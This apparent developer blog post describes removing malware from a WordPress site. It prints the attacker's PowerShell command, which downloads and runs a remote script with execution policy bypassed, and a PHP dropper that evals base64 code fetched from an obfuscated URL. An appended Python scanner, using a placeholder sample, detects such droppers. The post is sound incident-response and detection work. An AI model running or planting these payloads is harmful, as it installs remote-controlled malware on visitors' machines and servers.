Removing malware from a WordPress website

Full Stack Developer | HTML,CSS, Javascript, WordPress | @sinapradip
A client messaged me very early in the morning that their website seemed to be infected with a virus. People visiting the website would download a malicious file, and their antivirus would go crazy defending against the virus after that.
At a glance, I already saw the virus. It was forcing the user to open the Run dialog and paste a malicious script from the clipboard.

A quick Google search said it was a PowerShell virus. That confirmed it.
A PowerShell virus on a WordPress website likely involves malicious scripts injected into the site's files or database, possibly through a compromised plugin or theme. These scripts can be used to redirect users, deface the site, or install further malware. Security measures like PowerShell's execution policy and robust security plugins can help mitigate the risk.
How PowerShell is used in WordPress attacks:
- Compromised plugins/themes
- Database injection
- File system injection
- Obfuscation
- Exploiting PowerShell's capabilities
What I did to remove the virus:
- Removed malicious files
- Installed the Wordfence WordPress security plugin
- Updated WordPress, plugins, and themes
- Removed malicious backups
Further, I also disabled comments using the Disable Comments plugin and prevented spam using CleanTalk.
And it was done. 👍
Read the mitigation in detail below:
First, I put the website in maintenance mode so that no other people would continue to download the virus. Then I took a backup of the website using the UpdraftPlus backup plugin. I knew I would be taking an infected backup, but that is what felt right at that moment.
The PowerShell command it was executing was:

```powershell
powershell -w h -c "$f=$env:TEMP+'\\'+[guid]::NewGuid()+'.ps1';curl http://XXX.XXX.XXX.XXX/KHK.dof -o $f;powershell -w h -ep Bypass -f $f"
```
Investigating
Upon one-by-one plugin deactivation, no plugin seemed to be the culprit.
But deactivating the Astra theme seemed to remove the issue. That meant a theme file was infected.
Upon deleting the theme and reinstalling it, the issue seemed to be gone. But my doubt hadn’t vanished yet. I went on with further investigation.
I turned off maintenance mode for the time being and went for a manual inspection in the file manager.
Suspicious files (wco.php, wgg.php, wgr.php, wp-joc.php, wti.php)

Upon reading the code inside the files, they were indeed malicious files from an attacker.
The hacker had also added a backup admin user, just in case. I immediately deleted it.

wco.php

Inside wco.php there was malicious code that fetches a base64-encoded script and executes it.
It was fetching the base64 content from a URL (http://www.maliciouswebsitename.com/assets/img/jw/fm.txt).
wco.php:

```php
khdeff;<?php echo eval("\77\76" . base64_decode(file_get_contents("\xxx\xxx\x74\x70\x3a\x2f\57\x77\167\167\x2e\144\151\x65\157\x69\166\153\x2e\143\x6f\x6d\x2f\141\x73\x73\145\x74\163\x2f\x69\155\147\x2f\x6a\x77\x2f\x66\x6d\56\x74\170\164"))); __halt_compiler();?>
```
The content this script fetched was a highly powerful backdoor disguised as a file manager.
After doing all this, I was confident that I had removed the virus. But they say “No system is 100% secure”. Hence there has always been a nagging doubt in my mind since the incident. I made up my mind that I would keep monitoring the website for a few days even after the mitigation.
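The dropper above hides its download URL as a string of hex and octal escapes, which is exactly what makes such files easy to miss when eyeballing a theme directory. The following is an added example (my own code, not the author's and not part of any plugin) of a small scanner that a site owner could run over a WordPress tree during a cleanup like this one: it decodes PHP numeric escapes the way PHP would, recovers any URL hidden in them, and flags files that combine `eval()` with `base64_decode()`, `file_get_contents()`, `__halt_compiler()` or an escape-only string literal. The sample files it scans are constructed inline, and the encoded URL in them is a placeholder (`example.invalid`), not the address from the post.

```python
import tempfile
from pathlib import Path
import re

# PHP double-quoted numeric escapes: \xHH (hex) and \ooo (octal), the
# obfuscation used in the wco.php dropper quoted above.
PHP_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")

# Indicators matching the dropper's shape: eval() over base64-decoded content
# pulled in with file_get_contents(), an escape-only string literal, and
# __halt_compiler() which lets a payload sit after the PHP code.
INDICATORS = {
    "eval_call": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "remote_read": re.compile(r"\bfile_get_contents\s*\("),
    "halt_compiler": re.compile(r"__halt_compiler\s*\("),
    "escaped_literal": re.compile(r'"(?:\\x[0-9A-Fa-f]{1,2}|\\[0-7]{1,3}){6,}"'),
}
URL = re.compile(r"https?://[^\s\"')]+")

# Constructed sample tree (hypothetical): one clean theme file and one file
# shaped like the dropper on the page. The encoded URL decodes to a placeholder.
SAMPLE_FILES = {
    "wp-content/themes/astra/functions.php":
        "<?php\nadd_action('init', 'astra_setup');\n"
        "function astra_setup() { load_theme_textdomain('astra'); }\n",
    "wco.php":
        r'<?php echo eval("\77\76" . base64_decode(file_get_contents('
        r'"\x68\x74\x74\160\x3a\57\57\x65\170\141\x6d\160\154\145\56\x69'
        r'\156\166\141\154\151\x64\57\146\155\56\164\170\164"))); '
        r'__halt_compiler();?>',
}


def decode_php_escapes(s: str) -> str:
    """Resolve \\xHH and \\ooo escapes as PHP does inside a double-quoted string."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return PHP_ESCAPE.sub(repl, s)


def scan_source(text: str) -> dict:
    """Return which indicators fire and any URLs visible once escapes are decoded."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    urls = URL.findall(decode_php_escapes(text))
    return {"indicators": hits, "urls": urls}


def is_suspicious(report: dict) -> bool:
    # eval() fed by decoded or remotely fetched content is the signal;
    # a lone eval() is worth a look but is not flagged on its own here.
    hits = set(report["indicators"])
    fed_by = hits & {"base64_decode", "remote_read", "escaped_literal"}
    return "eval_call" in hits and bool(fed_by or report["urls"])


def scan_tree(root: str) -> dict:
    """Walk a WordPress tree and return reports for PHP files that look like droppers."""
    flagged = {}
    for path in Path(root).rglob("*.php"):
        if not path.is_file():
            continue
        report = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if is_suspicious(report):
            flagged[str(path.relative_to(root))] = report
    return flagged


def demo() -> dict:
    """Write the constructed sample tree to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE_FILES.items():
            target = Path(tmp, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(tmp)


if __name__ == "__main__":
    for name, report in demo().items():
        print(name, report["indicators"], report["urls"])
```

Run it against a site root (`scan_tree("/var/www/html")`) after restoring from a known-good backup, and treat every flagged file and every decoded URL as something to investigate, not as proof on its own; legitimate plugins occasionally use `base64_decode()`, which is why the scanner insists on `eval()` being present as well.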
